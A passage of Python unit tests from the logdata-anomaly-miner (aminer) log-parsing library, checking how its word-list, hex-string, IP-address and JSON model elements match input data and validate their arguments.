DummyMatchContext(data) fixed_wordlist_dme = FixedWordlistDataModelElement(self.id_, self.wordlist) match_element = fixed_wordlist_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"1 word" match_context = DummyMatchContext(data) fixed_wordlist_dme = FixedWordlistDataModelElement(self.id_, self.wordlist) match_element = fixed_wordlist_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test3element_id_input_validation(self): """Check if element_id is validated.""" self.assertRaises(ValueError, FixedWordlistDataModelElement, "", self.wordlist) # empty element_id self.assertRaises(TypeError, FixedWordlistDataModelElement, None, self.wordlist) # None element_id self.assertRaises(TypeError, FixedWordlistDataModelElement, b"path", self.wordlist) # bytes element_id is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, True, self.wordlist) # boolean element_id is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, 123, self.wordlist) # integer element_id is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, 123.22, self.wordlist) # float element_id is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, {"id": "path"}, self.wordlist) # dict element_id is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, ["path"], self.wordlist) # list element_id is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, [], self.wordlist) # empty list element_id is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, (), self.wordlist) # empty tuple element_id is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, set(), self.wordlist) # empty set element_id is not allowed def test4wordlist_input_validation(self): """Check if wordlist is validated.""" self.assertRaises(TypeError, FixedWordlistDataModelElement, self.id_, "path") # string wordlist self.assertRaises(TypeError, FixedWordlistDataModelElement, self.id_, None) # None wordlist self.assertRaises(TypeError, FixedWordlistDataModelElement, self.id_, b"path") # bytes wordlist is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, self.id_, True) # boolean wordlist is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, self.id_, 123) # integer wordlist is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, self.id_, 123.22) # float wordlist is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, self.id_, {"id": "path"}) # dict wordlist is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, self.id_, ["path", "path2"]) # list wordlist with strings not allowed self.assertRaises(ValueError, FixedWordlistDataModelElement, self.id_, [b"word", b"path", b"path-like"]) # wrong word order self.assertRaises(ValueError, FixedWordlistDataModelElement, self.id_, [b"wordlist", b"word", b"word dictionary"]) # wrong order self.assertRaises(ValueError, FixedWordlistDataModelElement, self.id_, []) # empty list wordlist is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, self.id_, ()) # empty tuple wordlist is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, self.id_, set()) # empty set wordlist is not allowed def test5get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = FixedWordlistDataModelElement(self.id_, self.wordlist) data = b"abcdefghijklmnopqrstuvwxyz.!?" model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(None, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/parsing/HexStringModelElementTest.py000066400000000000000000000215761437606560100310620ustar00rootroot00000000000000import unittest from aminer.parsing.HexStringModelElement import HexStringModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase, DummyMatchContext class HexStringModelElementTest(TestBase): """Unittests for the HexStringModelElement.""" id_ = "hex" path = "path" def test1get_match_element_valid_match(self): """Try all values and check if the desired results are produced.""" allowed_chars = [b"0", b"1", b"2", b"3", b"4", b"5", b"6", b"7", b"8", b"9", b"a", b"b", b"c", b"d", b"e", b"f"] char1 = b"\x00" char2 = b"\x00" hex_string_model_element = HexStringModelElement(self.id_) while ord(char2) < ord(b"\x7F"): data = char2 + char1 match_context = DummyMatchContext(data) match_element = hex_string_model_element.get_match_element(self.path, match_context) if char2 in allowed_chars: if char1 in allowed_chars: match_context.match_string = bytes.fromhex(data.decode()) # match_context.match_string check has to be skipped. match_context.match_data = data[len(match_context.match_string):] # match_context.match_data has to be rewritten. self.compare_match_results( data, match_element, match_context, self.id_, self.path, bytes.fromhex(data.decode()), data, None) self.assertEqual(match_element.get_match_object(), data) else: match_context.match_string = bytes.fromhex("0" + char2.decode()) # match_context.match_string check has to be skipped. self.compare_match_results( data, match_element, match_context, self.id_, self.path, bytes.fromhex("0" + char2.decode()), char2, None) self.assertEqual(match_element.get_match_object(), char2) else: self.compare_no_match_results(data, match_element, match_context) if ord(char1) == 0x7f: char1 = b"\x00" char2 = bytes(chr(ord(char2) + 1), "utf-8") else: char1 = bytes(chr(ord(char1) + 1), "utf-8") allowed_chars = [b"0", b"1", b"2", b"3", b"4", b"5", b"6", b"7", b"8", b"9", b"A", b"B", b"C", b"D", b"E", b"F"] char1 = b"\x00" char2 = b"\x00" hex_string_model_element = HexStringModelElement(self.id_, True) while ord(char2) < ord(b"\x7F"): data = char2 + char1 match_context = DummyMatchContext(data) match_element = hex_string_model_element.get_match_element(self.path, match_context) if char2 in allowed_chars: if char1 in allowed_chars: self.assertEqual(match_element.get_match_object(), data) else: self.assertEqual(match_element.get_match_object(), char2) else: self.compare_no_match_results(data, match_element, match_context) if ord(char1) == 0x7f: char1 = b"\x00" char2 = bytes(chr(ord(char2) + 1), "utf-8") else: char1 = bytes(chr(ord(char1) + 1), "utf-8") def test2get_match_element_no_match(self): """Parse not matching substring from MatchContext and check if the MatchContext was not changed.""" data = b"" match_context = DummyMatchContext(data) hex_me = HexStringModelElement(self.id_) match_element = hex_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test3element_id_input_validation(self): """Check if element_id is validated.""" self.assertRaises(ValueError, HexStringModelElement, "") # empty element_id self.assertRaises(TypeError, HexStringModelElement, None) # None element_id self.assertRaises(TypeError, HexStringModelElement, b"path") # bytes element_id is not allowed self.assertRaises(TypeError, HexStringModelElement, True) # boolean element_id is not allowed self.assertRaises(TypeError, HexStringModelElement, 123) # integer element_id is not allowed self.assertRaises(TypeError, HexStringModelElement, 123.22) # float element_id is not allowed self.assertRaises(TypeError, HexStringModelElement, {"id": "path"}) # dict element_id is not allowed self.assertRaises(TypeError, HexStringModelElement, ["path"]) # list element_id is not allowed self.assertRaises(TypeError, HexStringModelElement, []) # empty list element_id is not allowed self.assertRaises(TypeError, HexStringModelElement, ()) # empty tuple element_id is not allowed self.assertRaises(TypeError, HexStringModelElement, set()) # empty set element_id is not allowed def test4upper_case_input_validation(self): """Check if element_id is validated.""" self.assertRaises(TypeError, HexStringModelElement, self.id_, "path") # string upper_case self.assertRaises(TypeError, HexStringModelElement, self.id_, None) # None upper_case self.assertRaises(TypeError, HexStringModelElement, self.id_, b"path") # bytes upper_case is not allowed self.assertRaises(TypeError, HexStringModelElement, self.id_, 123) # integer upper_case is not allowed self.assertRaises(TypeError, HexStringModelElement, self.id_, 123.22) # float upper_case is not allowed self.assertRaises(TypeError, HexStringModelElement, self.id_, {"id": "path"}) # dict upper_case is not allowed self.assertRaises(TypeError, HexStringModelElement, self.id_, ["path"]) # list upper_case is not allowed self.assertRaises(TypeError, HexStringModelElement, self.id_, []) # empty list upper_case is not allowed self.assertRaises(TypeError, HexStringModelElement, self.id_, ()) # empty tuple upper_case is not allowed self.assertRaises(TypeError, HexStringModelElement, self.id_, set()) # empty set upper_case is not allowed def test5get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = HexStringModelElement(self.id_) data = b"abcdefghijklmnopqrstuvwxyz.!?" model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(None, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) def test6performance(self): # skipcq: PYL-R0201 """Test the performance of the implementation. Comment this test out in normal cases.""" import_setup = """ import copy from unit.TestBase import DummyMatchContext from aminer.parsing.HexStringModelElement import HexStringModelElement times = 100000 """ string_short_setup = """ hex_string = b"100" """ string_long_setup = """ hex_string = b"23999EA30A3430DA" """ end_setup = """ dummy_match_context = DummyMatchContext(hex_string) dummy_match_context_list = [copy.deepcopy(dummy_match_context) for _ in range(times)] hex_string_dme = HexStringModelElement("s0") def run(): match_context = dummy_match_context_list.pop(0) hex_string_dme.get_match_element("hex", match_context) """ _setup_short = import_setup + string_short_setup + end_setup _setup_long = import_setup + string_long_setup + end_setup # import timeit # times = 100000 # print("Every hex string is run 100.000 times.") # t = timeit.timeit(setup=_setup_short, stmt="run()", number=times) # print("Hex string 100: ", t) # t = timeit.timeit(setup=_setup_long, stmt="run()", number=times) # print("Hex string 23999EA30A3430DA: ", t) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/parsing/IpAddressDataModelElementTest.py000066400000000000000000000333201437606560100316050ustar00rootroot00000000000000import unittest from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase, DummyMatchContext class IpAddressDataModelElementTest(TestBase): """Unittests for the IpAddressDataModelElement.""" id_ = "ip" path = "path" def test1get_match_element_valid_ipv4_match(self): """ This test case checks the functionality by parsing a real IP-addresses. The boundary values for IP-addresses is 0.0.0.0 - 255.255.255.255 The numerical representation of the ip address was calculated with the help of http://www.aboutmyip.com/AboutMyXApp/IP2Integer.jsp. """ ip_addr_dme = IpAddressDataModelElement(self.id_) data = b"192.168.0.155 followed by some text" value = b"192.168.0.155" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 3232235675, None) data = b"0.0.0.0." value = b"0.0.0.0" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 0, None) data = b"255.255.255.255." value = b"255.255.255.255" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 4294967295, None) data = b"192.168.0.155.22 followed by some text" value = b"192.168.0.155" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 3232235675, None) def test2get_match_element_no_match_ipv4(self): """ Test if wrong formats are determined and boundary values are checked. Also check if hexadecimal ip addresses are not parsed as these are not allowed. Test if ip addresses are found, even if they are followed by other numbers. """ ip_addr_dme = IpAddressDataModelElement(self.id_) data = b"192. 168.0.155 followed by some text" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"256.168.0.155 followed by some text" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"\xc0\xa8\x00\x9b" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test3get_match_element_valid_ipv6_match(self): """ This test case checks the functionality by parsing a real IP-addresses. The numerical representation of the ip address was calculated with the help of https://www.ipaddressguide.com/ipv6-to-decimal. """ ip_addr_dme = IpAddressDataModelElement(self.id_, True) data = b"2001:4860:4860::8888 followed by some text" value = b"2001:4860:4860::8888" number = 42541956123769884636017138956568135816 match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, number, None) # full form of IPv6 data = b"fe80:0000:0000:0000:0204:61ff:fe9d:f156." value = b"fe80:0000:0000:0000:0204:61ff:fe9d:f156" number = 338288524927261089654164245681446711638 match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, number, None) # drop leading zeroes data = b"fe80:0:0:0:204:61ff:fe9d:f156." value = b"fe80:0:0:0:204:61ff:fe9d:f156" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, number, None) # collapse multiple zeroes to :: in the IPv6 address data = b"fe80::204:61ff:fe9d:f156 followed by some text" value = b"fe80::204:61ff:fe9d:f156" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, number, None) # localhost data = b"::1 followed by some text" value = b"::1" number = 1 match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, number, None) # link-local prefix data = b"fe80:: followed by some text" value = b"fe80::" number = 338288524927261089654018896841347694592 match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, number, None) # global unicast prefix data = b"2001:: followed by some text" value = b"2001::" number = 42540488161975842760550356425300246528 match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, number, None) def test4get_match_element_no_match_ipv6(self): """Test if wrong formats are determined and boundary values are checked.""" ip_addr_dme = IpAddressDataModelElement(self.id_, True) # IPv4 dotted quad at the end data = b"fe80:0000:0000:0000:0204:61ff:254.157.241.86" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # drop leading zeroes, IPv4 dotted quad at the end data = b"fe80:0:0:0:0204:61ff:254.157.241.86" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # dotted quad at the end, multiple zeroes collapsed data = b"fe80::204:61ff:254.157.241.86" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # multiple :: in the IPv6 address data = b"fe80::204:61ff::fe9d:f156" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # IPv4 address with ipv6 being True data = b"254.157.241.86" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # g in ip address data = b"2001:4860:48g0::8888 followed by some text" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test5element_id_input_validation(self): """Check if element_id is validated.""" self.assertRaises(ValueError, IpAddressDataModelElement, "") # empty element_id self.assertRaises(TypeError, IpAddressDataModelElement, None) # None element_id self.assertRaises(TypeError, IpAddressDataModelElement, b"path") # bytes element_id is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, True) # boolean element_id is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, 123) # integer element_id is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, 123.22) # float element_id is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, {"id": "path"}) # dict element_id is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, ["path"]) # list element_id is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, []) # empty list element_id is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, ()) # empty tuple element_id is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, set()) # empty set element_id is not allowed def test6ipv6_input_validation(self): """Check if ipv6 is validated.""" self.assertRaises(TypeError, IpAddressDataModelElement, self.id_, "path") # string ipv6 self.assertRaises(TypeError, IpAddressDataModelElement, self.id_, None) # None ipv6 self.assertRaises(TypeError, IpAddressDataModelElement, self.id_, b"path") # bytes ipv6 is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, self.id_, 123) # integer ipv6 is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, self.id_, 123.22) # float ipv6 is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, self.id_, {"id": "path"}) # dict ipv6 is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, self.id_, ["path"]) # list ipv6 is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, self.id_, []) # empty list ipv6 is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, self.id_, ()) # empty tuple ipv6 is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, self.id_, set()) # empty set ipv6 is not allowed def test7get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = IpAddressDataModelElement(self.id_) data = b"abcdefghijklmnopqrstuvwxyz.!?" model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(None, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) def test8performance(self): # skipcq: PYL-R0201 """Test the performance of the implementation.""" import_setup = """ import copy from unit.TestBase import DummyMatchContext from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement times = 300000 """ ip_192_setup = """ ip = b"192.168.0.155" dme = IpAddressDataModelElement("s0") """ ip_0_setup = """ ip = b"0.0.0.0" dme = IpAddressDataModelElement("s0") """ ip_255_setup = """ ip = b"255.255.255.255" dme = IpAddressDataModelElement("s0") """ end_setup = """ dummy_match_context = DummyMatchContext(ip) dummy_match_context_list = [copy.deepcopy(dummy_match_context) for _ in range(times)] def run(): match_context = dummy_match_context_list.pop(0) dme.get_match_element("match", match_context) """ _setup192 = import_setup + ip_192_setup + end_setup _setup0 = import_setup + ip_0_setup + end_setup _setup255 = import_setup + ip_255_setup + end_setup # import timeit # times = 300000 # print() # print("192.168.0.155 is run 300.000 times.") # t = timeit.timeit(setup=_setup192, stmt="run()", number=times) # print("time: ", t) # print() # print("0.0.0.0 is run 300.000 times.") # t = timeit.timeit(setup=_setup0, stmt="run()", number=times) # print("time: ", t) # print() # print("255.255.255.255 is run 300.000 times.") # t = timeit.timeit(setup=_setup255, stmt="run()", number=times) # print("time: ", t) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/parsing/JsonModelElementTest.py000066400000000000000000001507731437606560100300620ustar00rootroot00000000000000import copy import unittest import json from aminer.parsing.JsonModelElement import JsonModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from aminer.parsing.DecimalFloatValueModelElement import DecimalFloatValueModelElement from unit.TestBase import TestBase, DummyMatchContext, DummyFixedDataModelElement, DummyFirstMatchModelElement class JsonModelElementTest(TestBase): """Unittests for the JsonModelElement.""" id_ = "json" path = "path" single_line_json = b'{"menu": {"id": "file", "value": "File", "popup": {"menuitem": [{"value": "New", "onclick": "CreateNewDoc()"}, {' \ b'"value": "Open", "onclick": "OpenDoc()"}, {"value": "Close", "onclick": "CloseDoc()"}, ' \ b'{"value": "Undo", "onclick": "UndoDoc()", "clickable": true}]}}}' single_line_with_optional_key_json = b'{"menu": {"id": "file", "value": "File", "popup": {"menuitem": [{"value": "New", "onclick":' \ b' "CreateNewDoc()", "clickable": false}, {"value": "Open", "onclick": "OpenDoc()"}, {"value": ' \ b'"Close", "onclick": "CloseDoc()", "clickable": false}]}}}' single_line_missing_key_json = b'{"menu": {"id": "file", "popup": {"menuitem": [{"value": "New", "onclick": "CreateNewDoc()"}, {' \ b'"value": "Open", "onclick": "OpenDoc()"}, {"value": "Close", "onclick": "CloseDoc()"}]}}}' single_line_object_instead_of_array = b'{"menu": {"id": "file", "popup": {"menuitem": {"value": "New", "onclick": "CreateNewDoc()"}}}}' single_line_invalid_json = b'{"menu": {"id": "file", "value": "File", "popup": {"menuitem": [{"value": "New", "onclick": "CreateNew' \ b'Doc()"}, {"value": "Open", "onclick": "OpenDoc()"}, {"value": "Close", "onclick": "CloseDoc()"' single_line_no_match_json = b'{"menu": {"id": "NoMatch", "value": "File", "popup": {"menuitem": [{"value": "New", "onclick": "Create' \ b'NewDoc()"}, {"value": "Open", "onclick": "OpenDoc()"}, {"value": "Close", "onclick": "CloseDoc()"}]}}}' single_line_different_order_with_optional_key_json = \ b'{"menu": {"value": "File","popup": {"menuitem": [{"clickable": false, "value": "New", "onclick": "CreateNewDoc()"}, {' \ b'"onclick": "OpenDoc()", "value": "Open"}, {"value": "Close", "onclick": "CloseDoc()", "clickable": false}]}, "id": "file"}}' single_line_json_array = b'{"menu": {"id": "file", "value": "File", "popup": ["value", "value", "value"]}}' single_line_escaped_json = br'{"a": "\x2d"}' single_line_empty_array = b'{"menu": {"id": "file", "value": "File", "popup": {"menuitem": []}}}' single_line_multiple_menuitems = \ b'{"menu": {"id": "file", "value": "File", "popup": {"menuitem": [{"value": "New", "onclick": "CreateNewDoc()"}, {"value": ' \ b'"Open", "onclick": "OpenDoc()"}, {"value": "Close", "onclick": "CloseDoc()"}, , ]}}}' multi_line_json = b"""{ "menu": { "id": "file", "value": "File", "popup": { "menuitem": [ {"value": "New", "onclick": "CreateNewDoc()"}, {"value": "Open", "onclick": "OpenDoc()"}, {"value": "Close", "onclick": "CloseDoc()"} ] } } }""" everything_new_line_json = b"""{ "menu": { "id": "file", "value": "File", "popup": { "menuitem": [ { "value": "New", "onclick": "CreateNewDoc()" }, { "value": "Open", "onclick": "OpenDoc()" }, { "value": "Close", "onclick": "CloseDoc()" } ] } } }""" array_of_arrays = b'{"a": [["abc", "abc", "abc"], ["abc", "abc"], ["abc"]]}' key_parser_dict = {"menu": { "id": DummyFixedDataModelElement("id", b"file"), "value": DummyFixedDataModelElement("value", b"File"), "popup": { "menuitem": [{ "value": DummyFirstMatchModelElement("buttonNames", [ DummyFixedDataModelElement("new", b"New"), DummyFixedDataModelElement("open", b"Open"), DummyFixedDataModelElement("close", b"Close")]), "onclick": DummyFirstMatchModelElement("buttonOnclick", [ DummyFixedDataModelElement("create_new_doc", b"CreateNewDoc()"), DummyFixedDataModelElement("open_doc", b"OpenDoc()"), DummyFixedDataModelElement("close_doc", b"CloseDoc()")]), "optional_key_clickable": DummyFirstMatchModelElement("clickable", [ DummyFixedDataModelElement("true", b"true"), DummyFixedDataModelElement("false", b"false")]) }, { "value": DummyFirstMatchModelElement("buttonNames", [DummyFixedDataModelElement("undo", b"Undo")]), "onclick": DummyFirstMatchModelElement("buttonOnclick", [DummyFixedDataModelElement("undo_doc", b"UndoDoc()")]), "clickable": DummyFirstMatchModelElement("clickable", [ DummyFixedDataModelElement("true", b"true"), DummyFixedDataModelElement("false", b"false")]) }] }}} key_parser_dict_allow_all = {"menu": { "id": DummyFixedDataModelElement("id", b"file"), "value": DummyFixedDataModelElement("value", b"File"), "popup": "ALLOW_ALL" }} key_parser_dict_array = {"menu": { "id": DummyFixedDataModelElement("id", b"file"), "value": DummyFixedDataModelElement("value", b"File"), "popup": [ DummyFixedDataModelElement("value", b"value") ] }} key_parser_dict_escaped = {"a": DummyFixedDataModelElement("id", b"-")} empty_key_parser_dict = {"optional_key_key": DummyFixedDataModelElement("key", b"value")} key_parser_dict_allow_all_fields = {"menu": { "id": DummyFixedDataModelElement("id", b"file") }} key_parser_dict_array_of_arrays = {"a": [[DummyFixedDataModelElement("abc", b"abc")]]} def test1get_match_element_valid_match(self): """Parse matching substring from MatchContext and check if the MatchContext was updated with all characters.""" json_model_element = JsonModelElement(self.id_, self.key_parser_dict) data = self.single_line_json value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) data = self.multi_line_json value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) data = self.everything_new_line_json value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) # Test if keys differently ordered than in the key_parser_dict are parsed properly. data = self.single_line_different_order_with_optional_key_json value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) data = self.single_line_empty_array value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) json_model_element = JsonModelElement(self.id_, self.key_parser_dict_allow_all) data = self.single_line_different_order_with_optional_key_json value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(value).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) json_model_element = JsonModelElement(self.id_, self.key_parser_dict_array) data = self.single_line_json_array value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(value).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) json_model_element = JsonModelElement(self.id_, self.key_parser_dict_escaped) data = self.single_line_escaped_json.decode("unicode-escape").encode() value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(value).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) json_model_element = JsonModelElement(self.id_, self.key_parser_dict_array_of_arrays) data = self.array_of_arrays value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) def test2get_match_element_with_optional_key(self): """Validate optional keys with the optional_key_prefix.""" json_model_element = JsonModelElement(self.id_, self.key_parser_dict) data = self.single_line_with_optional_key_json value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) json_model_element = JsonModelElement(self.id_, self.empty_key_parser_dict) data = b"{}" value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(data)).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) json_model_element = JsonModelElement(self.id_, self.empty_key_parser_dict) data = b'{"key": "value"}' value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(data)).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) json_model_element = JsonModelElement(self.id_, self.empty_key_parser_dict) data = 